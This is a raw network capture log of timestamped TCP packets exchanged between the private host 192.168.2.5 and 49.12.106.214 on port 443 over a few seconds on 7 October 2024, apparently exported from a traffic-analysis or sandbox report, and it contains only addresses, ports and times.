                                                                                                                                                                                        Oct 7, 2024 20:35:30.727775097 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727804899 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727979898 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758404016 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758433104 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758920908 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758979082 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758985996 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758985996 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759011984 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759025097 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759068012 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759588003 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759605885 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759692907 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759692907 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759699106 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759744883 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.768330097 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.768358946 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.768850088 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.768862963 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.768990040 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812643051 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812671900 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812777996 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812866926 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812875986 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812913895 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812947989 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812947989 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813014030 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813369989 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813385010 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813457966 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813463926 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813627005 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.814202070 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.814234018 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.814266920 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.814277887 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.814338923 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.815404892 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.845820904 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.845850945 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846059084 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846057892 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846086025 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846111059 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846153975 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846182108 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846189022 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846285105 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846407890 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846429110 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846510887 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846510887 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846518993 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846683979 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.854187012 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.854216099 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.854343891 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.854350090 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.854707956 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899481058 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899523973 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899708986 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899708986 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899723053 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899979115 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900003910 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900024891 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900031090 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900087118 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900087118 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900381088 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900398970 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900444984 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900449991 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900489092 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900489092 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.901241064 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.901261091 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.901340961 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.901340961 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.901345968 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.901401997 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.931637049 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.931663036 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.931767941 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.931799889 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.931890965 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932034969 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932055950 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932100058 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932107925 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932123899 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932321072 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932579041 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932600975 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932684898 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932691097 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.932995081 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.981525898 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.981555939 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.982057095 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.982078075 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.524163961 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.539499998 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.539525986 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.539618015 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.539633989 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.539664030 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.539685011 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.552629948 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.552651882 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.552743912 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.552757025 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.552800894 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.569674015 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.569698095 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.569761992 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.569776058 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.569803953 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.569818020 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.581608057 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.581631899 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.581686020 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.581696033 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.581733942 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.590775013 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.590795040 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.590852022 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.590862036 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.590900898 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.600804090 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.600822926 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.600884914 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.600894928 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.600934029 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.608831882 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.608850002 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.608890057 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.608899117 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.608922958 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.608939886 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.617609978 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.617628098 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.617671967 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.617681026 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.617712021 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.617729902 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.628061056 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.628078938 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.628128052 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.628137112 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.628163099 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.628180027 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.638595104 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.638612986 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.638654947 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.638664007 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.638674974 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.638698101 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.651956081 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.651976109 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.652014017 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.652024984 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.652046919 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.652065039 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.666472912 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.666491032 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.666532040 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.666543007 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.666606903 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.666657925 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.678271055 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.678287983 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.678334951 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.678344011 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.678354979 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.678379059 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.686153889 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.686181068 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.686209917 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.686249971 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.686261892 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.686305046 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.695842028 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.695863008 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.695910931 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.695928097 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.695956945 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.695982933 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.703617096 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.703634024 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.703681946 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.703696012 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.703731060 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.703746080 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.711653948 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.711673975 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.711719036 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.711725950 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.711747885 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.711769104 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.721513987 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.721538067 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.721584082 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.721596956 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.721666098 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.721666098 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.740390062 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.740411997 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.740479946 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.740490913 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.740528107 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.755038023 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479501963 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479526043 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479581118 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479593992 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479625940 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479636908 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490262985 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490281105 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490336895 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490345955 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490375996 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490387917 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499351978 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499372005 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499454021 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499469995 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499483109 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499547958 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509167910 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509192944 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509236097 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509283066 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509289026 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509382010 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516236067 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516258001 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516307116 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516315937 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516344070 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516361952 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.524641991 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.524667025 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.524728060 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.524738073 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.524780035 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534374952 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534399986 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534440994 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534473896 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534481049 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534578085 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545553923 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545583010 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545639038 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545646906 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545686007 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545697927 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558334112 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558362007 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558439970 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558448076 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558482885 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558504105 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571434975 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571460009 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571511984 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571520090 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571543932 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571567059 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582096100 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582128048 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582169056 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582180023 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582222939 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582245111 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590111971 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590145111 CEST4434987549.12.106.214192.168.2.5
